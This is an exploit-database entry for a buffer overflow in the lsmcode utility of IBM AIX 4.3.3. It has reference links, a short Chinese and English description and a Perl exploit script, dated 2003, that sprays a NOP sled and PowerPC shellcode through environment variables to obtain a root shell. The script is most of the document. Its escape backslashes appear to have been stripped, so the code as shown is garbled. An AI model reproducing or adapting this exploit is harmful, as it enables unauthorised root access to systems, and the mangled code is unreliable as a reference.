https://www.exploit-db.com/exploits/22756
https://www.securityfocus.com/bid/82897
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-178

AIX4.3.3版本lsmcode存在缓冲区溢出漏洞。

source: http://www.securityfocus.com/bid/7871/info

Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges. 

#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested  : on Aix4.3.3.Mybe can work on other versions.
# Author  : [email protected]
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-6-1
# Announce: use as your owner risk!

$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;

$XID="x03";
$UID="x97";
print "nnExploit $CMD for Aix 4.3.3 to get uid=0 shell.n";
print "From: [ www.xfocus.org 2003-6-1 ].nn";

$NOP="x7cxa5x2ax79"x800;
%ENV=();

$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="x2fxf2x2ax2f"x300;
$ret = system $CMD ,"-d","a";

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    $ENV{DIAGNOSTICS}="A"x $j ."x2fxf2x2ax2f"x300;
    $ret = system $CMD ,"-d","a";
  }
}

#sub
sub getshell($XID,$GID) {
  my $SHELL,($XID,$GID)=@_;
  $SHELL="x7ex94xa2x79x7ex84xa3x78x40x82xffxfd";
  $SHELL.="x7exa8x02xa6x3axb5x01x40x88x55xfexe0";
  $SHELL.="x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
  $SHELL.="x4cxc6x33x42x44xffxffx02$GID$XIDxffxff";
  $SHELL.="x38x75xffx04x38x95xffx0cx7ex85xa3x78";
  $SHELL.="x90x75xffx0cx92x95xffx10x88x55xfexe1";
  $SHELL.="x9ax95xffx0bx4bxffxffxd8/bin/shxff";
  return $SHELL;
}
#EOF

IBM AIX 4.3.3

来源:AIXAPAR
名称:IY29589
链接:http://archives.neohapsis.com/archives/aix/2002-q2/0005.html